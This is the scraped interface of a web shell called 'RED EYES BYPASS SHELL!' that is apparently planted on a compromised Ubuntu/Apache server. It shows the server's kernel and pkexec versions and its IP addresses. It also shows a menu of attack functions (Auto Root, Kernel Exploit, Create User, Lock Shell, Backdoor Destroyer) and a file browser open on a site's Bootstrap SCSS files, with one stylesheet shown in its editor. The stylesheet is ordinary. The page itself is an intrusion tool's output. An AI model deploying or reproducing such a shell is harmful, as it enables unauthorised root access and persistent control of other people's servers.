Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
pdpa /
src /
scss /
bootstrap /
forms /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
_floating-labels.scss
1.71
KB
-rwxr-xr-x
_form-check.scss
3.81
KB
-rwxr-xr-x
_form-control.scss
6.58
KB
-rwxr-xr-x
_form-range.scss
2.75
KB
-rwxr-xr-x
_form-select.scss
2.33
KB
-rwxr-xr-x
_form-text.scss
219
B
-rwxr-xr-x
_input-group.scss
3.32
KB
-rwxr-xr-x
_labels.scss
1.12
KB
-rwxr-xr-x
_validation.scss
478
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _floating-labels.scss
.form-floating { position: relative; > .form-control, > .form-select { height: $form-floating-height; line-height: $form-floating-line-height; } > label { position: absolute; top: 0; left: 0; height: 100%; // allow textareas padding: $form-floating-padding-y $form-floating-padding-x; pointer-events: none; border: $input-border-width solid transparent; // Required for aligning label's text with the input as it affects inner box model transform-origin: 0 0; @include transition($form-floating-transition); } // stylelint-disable no-duplicate-selectors > .form-control { padding: $form-floating-padding-y $form-floating-padding-x; &::placeholder { color: transparent; } &:focus, &:not(:placeholder-shown) { padding-top: $form-floating-input-padding-t; padding-bottom: $form-floating-input-padding-b; } // Duplicated because `:-webkit-autofill` invalidates other selectors when grouped &:-webkit-autofill { padding-top: $form-floating-input-padding-t; padding-bottom: $form-floating-input-padding-b; } } > .form-select { padding-top: $form-floating-input-padding-t; padding-bottom: $form-floating-input-padding-b; } > .form-control:focus, > .form-control:not(:placeholder-shown), > .form-select { ~ label { opacity: $form-floating-label-opacity; transform: $form-floating-label-transform; } } // Duplicated because `:-webkit-autofill` invalidates other selectors when grouped > .form-control:-webkit-autofill { ~ label { opacity: $form-floating-label-opacity; transform: $form-floating-label-transform; } } // stylelint-enable no-duplicate-selectors }
Close